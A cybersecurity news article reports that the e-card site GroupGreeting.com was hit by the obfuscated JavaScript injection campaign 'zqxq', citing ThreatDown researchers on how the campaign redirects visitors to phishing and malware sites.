The popular e-card platform GroupGreeting.com, used by major companies such as Airbnb, Coca-Cola, and eBay, recently fell victim to a widespread cyberattack known as the “zqxq” campaign. This malicious campaign, which mirrors tactics from the NDSW/NDSX and TDS Parrot attacks, targeted thousands of websites using sophisticated JavaScript injection techniques. The attack was discovered by ThreatDown, powered by Malwarebytes, as part of their ongoing monitoring of large-scale cyber threats.
At its core, the “zqxq” campaign uses obfuscated JavaScript to infiltrate high-traffic websites, particularly those experiencing seasonal spikes in activity. According to Stefan Dasic, manager of research and response for ThreatDown, “The seasonal increase in user interactions with greeting card sites provides ample opportunities for cybercriminals to quietly inject malware and target unsuspecting visitors.”
Key Features of the Attack:
- Obfuscated Code: The malware hides in legitimate files using scrambled variables and custom functions like HttpClient, rand, and token. These methods evade detection and hinder analysis by researchers.
- Traffic Direction Systems (TDS): After validating user properties such as browser history or cookies, the malicious script redirects traffic to exploit kits, phishing sites, or additional malware payloads.
- Massive Scale: Over 2,800 websites have been compromised using similar tactics, exploiting vulnerabilities in WordPress, Joomla, Magento, or outdated plugins.
Cybercriminals selected GroupGreeting for its high-profile nature and its reputation as a trusted platform. With over 25,000 workplace clients and significant seasonal traffic during events like holidays and birthdays, GroupGreeting was an ideal entry point for malware distribution. As Dasic noted, “Visitors are more inclined to trust links from a service they deem reputable”.
Potential Impact:
- User Redirects: Victims’ browsers are redirected to malicious domains hosting phishing pages or info-stealing malware.
- Persistence Mechanisms: Even if one infected file is removed, the malware’s ability to hide in multiple locations allows reinfection.
- Secondary Payloads: From credential theft to ransomware, attackers leverage the trust users place in GroupGreeting to deploy devastating secondary attacks.
The “zqxq” campaign shares notable similarities with the NDSW/NDSX and TDS Parrot JavaScript threats. Both involve deeply obfuscated code, automated infection of thousands of websites, and redirection to malicious domains. According to data from Sucuri and Unit 42, these campaigns collectively accounted for over 43,000 detections in 2024 alone.
The attack on GroupGreeting demonstrates how cybercriminals exploit trusted platforms to reach a wider audience, particularly during periods of high activity. As Dasic aptly put it, “Even ‘safe’ or well-known websites can be hijacked”. With the scale and sophistication of these campaigns growing, organizations must prioritize both prevention and rapid response to safeguard users from such pervasive threats.
Related Posts:
- U.S. launches smart device security standards program – U.S. Cyber Trust Mark
- Beware the Windows Search Scam: Clever Phishing Campaign Exploits User Trust
- Let’s Encrypt Root gains the trust of all major root programs
- Experts speculate hackers begin to remotely exploit Intel CPU vulnerabilities
